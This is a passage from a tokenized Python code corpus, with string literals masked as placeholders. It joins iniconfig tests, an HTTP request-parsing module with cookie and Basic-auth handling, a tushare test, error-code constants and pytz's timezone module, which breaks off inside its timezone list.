'<STR_LIT>' ] ) == [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> def test_example_pypirc ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = dedent ( '''<STR_LIT>''' ) ) <EOL> distutils , pypi , other = list ( config ) <EOL> assert distutils [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert pypi [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert pypi [ '<STR_LIT:username>' ] == '<STR_LIT>' <EOL> assert pypi [ '<STR_LIT:password>' ] == '<STR_LIT>' <EOL> assert [ '<STR_LIT>' , '<STR_LIT:username>' , '<STR_LIT:password>' ] == list ( other ) <EOL> def test_api_import ( ) : <EOL> assert ALL == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> def test_iscommentline_true ( line ) : <EOL> assert iscommentline ( line ) </s>
<s> import base64 <EOL> import cgi <EOL> import Cookie <EOL> import os <EOL> import StringIO <EOL> import tempfile <EOL> import urlparse <EOL> import stash <EOL> from utils import HTTPException <EOL> missing = object ( ) <EOL> class Server ( object ) : <EOL> """<STR_LIT>""" <EOL> config = None <EOL> def __init__ ( self , request ) : <EOL> self . _stash = None <EOL> self . _request = request <EOL> @ property <EOL> def stash ( self ) : <EOL> if self . _stash is None : <EOL> address , authkey = stash . load_env_config ( ) <EOL> self . _stash = stash . Stash ( self . _request . url_parts . path , address , authkey ) <EOL> return self . _stash <EOL> class InputFile ( object ) : <EOL> max_buffer_size = <NUM_LIT> * <NUM_LIT> <EOL> def __init__ ( self , rfile , length ) : <EOL> """<STR_LIT>""" <EOL> self . _file = rfile <EOL> self . length = length <EOL> self . _file_position = <NUM_LIT:0> <EOL> if length > self . max_buffer_size : <EOL> self . _buf = tempfile . TemporaryFile ( mode = "<STR_LIT>" ) <EOL> else : <EOL> self . _buf = StringIO . StringIO ( ) <EOL> @ property <EOL> def _buf_position ( self ) : <EOL> rv = self . _buf . tell ( ) <EOL> assert rv <= self . _file_position <EOL> return rv <EOL> def read ( self , bytes = - <NUM_LIT:1> ) : <EOL> assert self . _buf_position <= self . _file_position <EOL> if bytes < <NUM_LIT:0> : <EOL> bytes = self . length - self . _buf_position <EOL> bytes_remaining = min ( bytes , self . length - self . _buf_position ) <EOL> if bytes_remaining == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> if self . _buf_position != self . _file_position : <EOL> buf_bytes = min ( bytes_remaining , self . _file_position - self . _buf_position ) <EOL> old_data = self . _buf . read ( buf_bytes ) <EOL> bytes_remaining -= buf_bytes <EOL> else : <EOL> old_data = "<STR_LIT>" <EOL> assert self . _buf_position == self . _file_position , ( <EOL> "<STR_LIT>" % <EOL> ( self . _buf_position , self . _file_position ) ) <EOL> new_data = self . _file . read ( bytes_remaining ) <EOL> self . _buf . write ( new_data ) <EOL> self . _file_position += bytes_remaining <EOL> assert self . _buf_position == self . _file_position , ( <EOL> "<STR_LIT>" % <EOL> ( self . _buf_position , self . _file_position ) ) <EOL> return old_data + new_data <EOL> def tell ( self ) : <EOL> return self . _buf_position <EOL> def seek ( self , offset ) : <EOL> if offset > self . length or offset < <NUM_LIT:0> : <EOL> raise ValueError <EOL> if offset <= self . _file_position : <EOL> self . _buf . seek ( offset ) <EOL> else : <EOL> self . read ( offset - self . _file_position ) <EOL> def readline ( self , max_bytes = None ) : <EOL> if max_bytes is None : <EOL> max_bytes = self . length - self . _buf_position <EOL> if self . _buf_position < self . _file_position : <EOL> data = self . _buf . readline ( max_bytes ) <EOL> if data . endswith ( "<STR_LIT:\n>" ) or len ( data ) == max_bytes : <EOL> return data <EOL> else : <EOL> data = "<STR_LIT>" <EOL> assert self . _buf_position == self . _file_position <EOL> initial_position = self . _file_position <EOL> found = False <EOL> buf = [ ] <EOL> max_bytes -= len ( data ) <EOL> while not found : <EOL> readahead = self . read ( min ( <NUM_LIT:2> , max_bytes ) ) <EOL> max_bytes -= len ( readahead ) <EOL> for i , c in enumerate ( readahead ) : <EOL> if c == "<STR_LIT:\n>" : <EOL> buf . append ( readahead [ : i + <NUM_LIT:1> ] ) <EOL> found = True <EOL> break <EOL> if not found : <EOL> buf . append ( readahead ) <EOL> if not readahead or not max_bytes : <EOL> break <EOL> new_data = "<STR_LIT>" . join ( buf ) <EOL> data += new_data <EOL> self . seek ( initial_position + len ( new_data ) ) <EOL> return data <EOL> def readlines ( self ) : <EOL> rv = [ ] <EOL> while True : <EOL> data = self . readline ( ) <EOL> if data : <EOL> rv . append ( data ) <EOL> else : <EOL> break <EOL> return rv <EOL> def next ( self ) : <EOL> data = self . readline ( ) <EOL> if data : <EOL> return data <EOL> else : <EOL> raise StopIteration <EOL> def __iter__ ( self ) : <EOL> return self <EOL> class Request ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , request_handler ) : <EOL> self . doc_root = request_handler . server . router . doc_root <EOL> self . route_match = None <EOL> self . protocol_version = request_handler . protocol_version <EOL> self . method = request_handler . command <EOL> scheme = request_handler . server . scheme <EOL> host = request_handler . headers . get ( "<STR_LIT>" ) <EOL> port = request_handler . server . server_address [ <NUM_LIT:1> ] <EOL> if host is None : <EOL> host = request_handler . server . server_address [ <NUM_LIT:0> ] <EOL> else : <EOL> if "<STR_LIT::>" in host : <EOL> host , port = host . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> self . request_path = request_handler . path <EOL> self . url_base = "<STR_LIT:/>" <EOL> if self . request_path . startswith ( scheme + "<STR_LIT>" ) : <EOL> self . url = request_handler . path <EOL> else : <EOL> self . url = "<STR_LIT>" % ( scheme , <EOL> host , <EOL> port , <EOL> self . request_path ) <EOL> self . url_parts = urlparse . urlsplit ( self . url ) <EOL> self . _raw_headers = request_handler . headers <EOL> self . request_line = request_handler . raw_requestline <EOL> self . _headers = None <EOL> self . raw_input = InputFile ( request_handler . rfile , <EOL> int ( self . headers . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) ) <EOL> self . _body = None <EOL> self . _GET = None <EOL> self . _POST = None <EOL> self . _cookies = None <EOL> self . _auth = None <EOL> self . server = Server ( self ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . method , self . url ) <EOL> @ property <EOL> def GET ( self ) : <EOL> if self . _GET is None : <EOL> params = urlparse . parse_qsl ( self . url_parts . query , keep_blank_values = True ) <EOL> self . _GET = MultiDict ( ) <EOL> for key , value in params : <EOL> self . _GET . add ( key , value ) <EOL> return self . _GET <EOL> @ property <EOL> def POST ( self ) : <EOL> if self . _POST is None : <EOL> pos = self . raw_input . tell ( ) <EOL> self . raw_input . seek ( <NUM_LIT:0> ) <EOL> fs = cgi . FieldStorage ( fp = self . raw_input , <EOL> environ = { "<STR_LIT>" : self . method } , <EOL> headers = self . headers , <EOL> keep_blank_values = True ) <EOL> self . _POST = MultiDict . from_field_storage ( fs ) <EOL> self . raw_input . seek ( pos ) <EOL> return self . _POST <EOL> @ property <EOL> def cookies ( self ) : <EOL> if self . _cookies is None : <EOL> parser = Cookie . BaseCookie ( ) <EOL> cookie_headers = self . headers . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> parser . load ( cookie_headers ) <EOL> cookies = Cookies ( ) <EOL> for key , value in parser . iteritems ( ) : <EOL> cookies [ key ] = CookieValue ( value ) <EOL> self . _cookies = cookies <EOL> return self . _cookies <EOL> @ property <EOL> def headers ( self ) : <EOL> if self . _headers is None : <EOL> self . _headers = RequestHeaders ( self . _raw_headers ) <EOL> return self . _headers <EOL> @ property <EOL> def body ( self ) : <EOL> if self . _body is None : <EOL> pos = self . raw_input . tell ( ) <EOL> self . raw_input . seek ( <NUM_LIT:0> ) <EOL> self . _body = self . raw_input . read ( ) <EOL> self . raw_input . seek ( pos ) <EOL> return self . _body <EOL> @ property <EOL> def auth ( self ) : <EOL> if self . _auth is None : <EOL> self . _auth = Authentication ( self . headers ) <EOL> return self . _auth <EOL> class RequestHeaders ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , items ) : <EOL> for key , value in zip ( items . keys ( ) , items . values ( ) ) : <EOL> key = key . lower ( ) <EOL> if key in self : <EOL> self [ key ] . append ( value ) <EOL> else : <EOL> dict . __setitem__ ( self , key , [ value ] ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> values = dict . __getitem__ ( self , key . lower ( ) ) <EOL> if len ( values ) == <NUM_LIT:1> : <EOL> return values [ <NUM_LIT:0> ] <EOL> else : <EOL> return "<STR_LIT:U+002CU+0020>" . join ( values ) <EOL> def __setitem__ ( self , name , value ) : <EOL> raise Exception <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def get_list ( self , key , default = missing ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return dict . __getitem__ ( self , key . lower ( ) ) <EOL> except KeyError : <EOL> if default is not missing : <EOL> return default <EOL> else : <EOL> raise <EOL> def __contains__ ( self , key ) : <EOL> return dict . __contains__ ( self , key . lower ( ) ) <EOL> def iteritems ( self ) : <EOL> for item in self : <EOL> yield item , self [ item ] <EOL> def itervalues ( self ) : <EOL> for item in self : <EOL> yield self [ item ] <EOL> class CookieValue ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , morsel ) : <EOL> self . key = morsel . key <EOL> self . value = morsel . value <EOL> for attr in [ "<STR_LIT>" , "<STR_LIT:path>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:version>" , "<STR_LIT>" ] : <EOL> setattr ( self , attr . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) , morsel [ attr ] ) <EOL> self . _str = morsel . OutputString ( ) <EOL> def __str__ ( self ) : <EOL> return self . _str <EOL> def __repr__ ( self ) : <EOL> return self . _str <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( other , "<STR_LIT:value>" ) : <EOL> return self . value == other . value <EOL> return self . value == other <EOL> class MultiDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __setitem__ ( self , name , value ) : <EOL> dict . __setitem__ ( self , name , [ value ] ) <EOL> def add ( self , name , value ) : <EOL> if name in self : <EOL> dict . __getitem__ ( self , name ) . append ( value ) <EOL> else : <EOL> dict . __setitem__ ( self , name , [ value ] ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . first ( key ) <EOL> def first ( self , key , default = missing ) : <EOL> """<STR_LIT>""" <EOL> if key in self and dict . __getitem__ ( self , key ) : <EOL> return dict . __getitem__ ( self , key ) [ <NUM_LIT:0> ] <EOL> elif default is not missing : <EOL> return default <EOL> raise KeyError <EOL> def last ( self , key , default = missing ) : <EOL> """<STR_LIT>""" <EOL> if key in self and dict . __getitem__ ( self , key ) : <EOL> return dict . __getitem__ ( self , key ) [ - <NUM_LIT:1> ] <EOL> elif default is not missing : <EOL> return default <EOL> raise KeyError <EOL> def get_list ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return dict . __getitem__ ( self , key ) <EOL> @ classmethod <EOL> def from_field_storage ( cls , fs ) : <EOL> self = cls ( ) <EOL> if fs . list is None : <EOL> return self <EOL> for key in fs : <EOL> values = fs [ key ] <EOL> if not isinstance ( values , list ) : <EOL> values = [ values ] <EOL> for value in values : <EOL> if value . filename : <EOL> value = value <EOL> else : <EOL> value = value . value <EOL> self . add ( key , value ) <EOL> return self <EOL> class Cookies ( MultiDict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __getitem__ ( self , key ) : <EOL> return self . last ( key ) <EOL> class Authentication ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , headers ) : <EOL> self . username = None <EOL> self . password = None <EOL> auth_schemes = { "<STR_LIT>" : self . decode_basic } <EOL> if "<STR_LIT>" in headers : <EOL> header = headers . get ( "<STR_LIT>" ) <EOL> auth_type , data = header . split ( "<STR_LIT:U+0020>" , <NUM_LIT:1> ) <EOL> if auth_type in auth_schemes : <EOL> self . username , self . password = auth_schemes [ auth_type ] ( data ) <EOL> else : <EOL> raise HTTPException ( <NUM_LIT> , "<STR_LIT>" % auth_type ) <EOL> def decode_basic ( self , data ) : <EOL> decoded_data = base64 . decodestring ( data ) <EOL> return decoded_data . split ( "<STR_LIT::>" , <NUM_LIT:1> ) </s>
<s> import unittest <EOL> import tushare . stock . fundamental as fd <EOL> class Test ( unittest . TestCase ) : <EOL> def set_data ( self ) : <EOL> self . code = '<STR_LIT>' <EOL> self . start = '<STR_LIT>' <EOL> self . end = '<STR_LIT>' <EOL> self . year = <NUM_LIT> <EOL> self . quarter = <NUM_LIT:4> <EOL> def test_get_stock_basics ( self ) : <EOL> print ( fd . get_stock_basics ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> SUCCESS = <NUM_LIT:0> <EOL> API_ERROR = <NUM_LIT> <EOL> CONFIG_FILE_PARSE_ERROR = <NUM_LIT> <EOL> AUTH_ERROR = <NUM_LIT> </s>
<s> '''<STR_LIT>''' <EOL> OLSON_VERSION = '<STR_LIT>' <EOL> VERSION = OLSON_VERSION <EOL> __version__ = OLSON_VERSION <EOL> OLSEN_VERSION = OLSON_VERSION <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> import sys , datetime , os . path , gettext <EOL> try : <EOL> from pkg_resources import resource_stream <EOL> except ImportError : <EOL> resource_stream = None <EOL> from pytz . exceptions import AmbiguousTimeError <EOL> from pytz . exceptions import InvalidTimeError <EOL> from pytz . exceptions import NonExistentTimeError <EOL> from pytz . exceptions import UnknownTimeZoneError <EOL> from pytz . lazy import LazyDict , LazyList , LazySet <EOL> from pytz . tzinfo import unpickler <EOL> from pytz . tzfile import build_tzinfo , _byte_string <EOL> try : <EOL> str <EOL> except NameError : <EOL> str = str <EOL> def ascii ( s ) : <EOL> r"""<STR_LIT>""" <EOL> s . encode ( '<STR_LIT>' ) <EOL> return s <EOL> else : <EOL> def ascii ( s ) : <EOL> r"""<STR_LIT>""" <EOL> return s . encode ( '<STR_LIT>' ) <EOL> def open_resource ( name ) : <EOL> """<STR_LIT>""" <EOL> name_parts = name . lstrip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> for part in name_parts : <EOL> if part == os . path . pardir or os . path . sep in part : <EOL> raise ValueError ( '<STR_LIT>' % part ) <EOL> filename = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' , * name_parts ) <EOL> if not os . path . exists ( filename ) and resource_stream is not None : <EOL> return resource_stream ( __name__ , '<STR_LIT>' + name ) <EOL> return open ( filename , '<STR_LIT:rb>' ) <EOL> def resource_exists ( name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> open_resource ( name ) . close ( ) <EOL> return True <EOL> except IOError : <EOL> return False <EOL> _tzinfo_cache = { } <EOL> def timezone ( zone ) : <EOL> r'''<STR_LIT>''' <EOL> if zone . upper ( ) == '<STR_LIT>' : <EOL> return utc <EOL> try : <EOL> zone = ascii ( zone ) <EOL> except UnicodeEncodeError : <EOL> raise UnknownTimeZoneError ( zone ) <EOL> zone = _unmunge_zone ( zone ) <EOL> if zone not in _tzinfo_cache : <EOL> if zone in all_timezones_set : <EOL> fp = open_resource ( zone ) <EOL> try : <EOL> _tzinfo_cache [ zone ] = build_tzinfo ( zone , fp ) <EOL> finally : <EOL> fp . close ( ) <EOL> else : <EOL> raise UnknownTimeZoneError ( zone ) <EOL> return _tzinfo_cache [ zone ] <EOL> def _unmunge_zone ( zone ) : <EOL> """<STR_LIT>""" <EOL> return zone . replace ( '<STR_LIT>' , '<STR_LIT:+>' ) . replace ( '<STR_LIT>' , '<STR_LIT:->' ) <EOL> ZERO = datetime . timedelta ( <NUM_LIT:0> ) <EOL> HOUR = datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> class UTC ( datetime . tzinfo ) : <EOL> """<STR_LIT>""" <EOL> zone = "<STR_LIT>" <EOL> _utcoffset = ZERO <EOL> _dst = ZERO <EOL> _tzname = zone <EOL> def fromutc ( self , dt ) : <EOL> if dt . tzinfo is None : <EOL> return self . localize ( dt ) <EOL> return super ( utc . __class__ , self ) . fromutc ( dt ) <EOL> def utcoffset ( self , dt ) : <EOL> return ZERO <EOL> def tzname ( self , dt ) : <EOL> return "<STR_LIT>" <EOL> def dst ( self , dt ) : <EOL> return ZERO <EOL> def __reduce__ ( self ) : <EOL> return _UTC , ( ) <EOL> def localize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . replace ( tzinfo = self ) <EOL> def normalize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is self : <EOL> return dt <EOL> if dt . tzinfo is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . astimezone ( self ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" <EOL> UTC = utc = UTC ( ) <EOL> def _UTC ( ) : <EOL> """<STR_LIT>""" <EOL> return utc <EOL> _UTC . __safe_for_unpickling__ = True <EOL> def _p ( * args ) : <EOL> """<STR_LIT>""" <EOL> return unpickler ( * args ) <EOL> _p . __safe_for_unpickling__ = True <EOL> class _CountryTimezoneDict ( LazyDict ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , iso3166_code ) : <EOL> """<STR_LIT>""" <EOL> return self [ iso3166_code ] <EOL> def _fill ( self ) : <EOL> data = { } <EOL> zone_tab = open_resource ( '<STR_LIT>' ) <EOL> try : <EOL> for line in zone_tab : <EOL> line = line . decode ( '<STR_LIT>' ) <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> code , coordinates , zone = line . split ( None , <NUM_LIT:4> ) [ : <NUM_LIT:3> ] <EOL> if zone not in all_timezones_set : <EOL> continue <EOL> try : <EOL> data [ code ] . append ( zone ) <EOL> except KeyError : <EOL> data [ code ] = [ zone ] <EOL> self . data = data <EOL> finally : <EOL> zone_tab . close ( ) <EOL> country_timezones = _CountryTimezoneDict ( ) <EOL> class _CountryNameDict ( LazyDict ) : <EOL> '''<STR_LIT>''' <EOL> def _fill ( self ) : <EOL> data = { } <EOL> zone_tab = open_resource ( '<STR_LIT>' ) <EOL> try : <EOL> for line in zone_tab . readlines ( ) : <EOL> line = line . decode ( '<STR_LIT>' ) <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> code , name = line . split ( None , <NUM_LIT:1> ) <EOL> data [ code ] = name . strip ( ) <EOL> self . data = data <EOL> finally : <EOL> zone_tab . close ( ) <EOL> country_names = _CountryNameDict ( ) <EOL> class _FixedOffset ( datetime . tzinfo ) : <EOL> zone = None <EOL> def __init__ ( self , minutes ) : <EOL> if abs ( minutes ) >= <NUM_LIT> : <EOL> raise ValueError ( "<STR_LIT>" , minutes ) <EOL> self . _minutes = minutes <EOL> self . _offset = datetime . timedelta ( minutes = minutes ) <EOL> def utcoffset ( self , dt ) : <EOL> return self . _offset <EOL> def __reduce__ ( self ) : <EOL> return FixedOffset , ( self . _minutes , ) <EOL> def dst ( self , dt ) : <EOL> return ZERO <EOL> def tzname ( self , dt ) : <EOL> return None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . _minutes <EOL> def localize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . replace ( tzinfo = self ) <EOL> def normalize ( self , dt , is_dst = False ) : <EOL> '''<STR_LIT>''' <EOL> if dt . tzinfo is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return dt . replace ( tzinfo = self ) <EOL> def FixedOffset ( offset , _tzinfos = { } ) : <EOL> """<STR_LIT>""" <EOL> if offset == <NUM_LIT:0> : <EOL> return UTC <EOL> info = _tzinfos . get ( offset ) <EOL> if info is None : <EOL> info = _tzinfos . setdefault ( offset , _FixedOffset ( offset ) ) <EOL> return info <EOL> FixedOffset . __safe_for_unpickling__ = True <EOL> def _test ( ) : <EOL> import doctest , os , sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . pardir ) <EOL> import pytz <EOL> return doctest . testmod ( pytz ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) <EOL> all_timezones = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 